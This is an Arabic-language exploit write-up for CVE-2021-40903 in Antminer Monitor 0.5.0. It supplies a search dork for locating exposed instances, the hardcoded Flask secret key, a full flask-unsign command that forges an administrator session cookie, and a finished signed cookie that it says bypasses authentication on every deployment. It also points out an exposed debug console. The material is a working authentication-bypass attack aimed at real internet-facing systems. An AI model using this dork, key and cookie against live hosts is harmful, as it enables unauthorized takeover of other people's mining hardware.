
CVE-2021-40903
التاريخ: 09/06/2021
Dork:https://www.zoomeye.org/searchResult?q=%22antminer%20monitor%22 مؤلف الاستغلال: CQR.company / Vulnz.
الصفحة الرئيسية للمورّد: https://github.com/anselal/antminer-monitor, https://twitter.com/intent/follow?screen_name=AntminerMonitor
رابط البرنامج: https://github.com/anselal/antminer-monitor, https://soulis.tech/
الإصدار: 0.5.0
تم اختباره على: Windows, Linux, Macos
يُستخدم البرنامج بشكل شائع لمراقبة أجهزة Antminer ويمكن العثور عليه بسهولة في zoomeye ( 800) و shodan ( 500). في الوقت الحالي، هذه هي أداة مراقبة antminer الأكثر شيوعًا. توجد الثغرة في Antminer Monitor بسبب باب خلفي أو إعداد خاطئ
من المطوّر داخل ملف الإعدادات في خادم Flask.
يحتوي ملف الإعدادات على سلسلة سرية محددة مسبقًا، والتي كان من المفترض أن تُولَّد عشوائيًا، لكنها ثابتة في هذا build.antminer-monitor/settings.py at 5c62e1064af30674bacb9e1917d5980efbde1fcd · anselal/antminer-monitor · GitHub https://github.com/anselal/antminer-monitor/blob/5c62e1064af30674bacb9e1917d5980efbde1fcd/config/settings.py
المفتاح السري هو 'super secret key'.
بناءً على هذه المعلومات، يمكننا صياغة ملفات تعريف ارتباط لتجاوز المصادقة.
باستخدام أداة flask-unsing يمكننا توليد ملف تعريف ارتباط سيمنحك وصولًا بصلاحيات المسؤول.
flask-unsign --sign --cookie "{'_fresh': True, '_id': b'df230a95eb5318d31fa83690c667cfd6a824dbfe61949bf30b9d75e71c6ea20714b87113fcafe2340df9a8a6f3567e7a2faedc2c12d05e4e338558e47afe84f6', '_user_id': '1', 'csrf_token': b'15d0261b7f3f40849920ebb94f7a2368397f76ff'}" --secret "super secret key"
علاوة على ذلك، يمكنك استخدام ملف تعريف الارتباط الشامل هذا للوصول إلى الواجهة
الإلكترونية لتطبيق Flask.
يمكن أن يعمل ملف تعريف الارتباط هذا على جميع الأنظمة في حقل "session".
.eJw9j81Og0AURl_FzLoLfmTTpAubaQkm9xLMpeTeTaNAGQdGE9BQp-m7O3HhA3zfOeemzpe5X4zaXl6npd-o83untjf18Ka2SnL-Ab83JZ0mtrUHMiP4o2MaPNpxZc8JJuhEiyl1EUn-7IT4WlKVsWMPeZGJbmOh9speJqZiRX-I2A4p0MGLQyOuDoxqDayMyRgMOyROhToDTow0LxYcXMFVKzZ1JAS-1HVc5nWEyTHwhkgs79Q9uH8v_fwXoGK1Ue0yX85fn2P_8V8EdBpBFwk0RSoWHeqnR9RjBnY_sSsyzDkNlqFu8CV1DoOjDLvwfv8FnZ1jTQ.YS2Hvw.a-bvt7Y4e2kKNs0iXkRxHnRRJAU
بالإضافة إلى ذلك، DEBUG = True مما يعني أن /console يعمل، لكنه يحتاج إلى رمز PIN.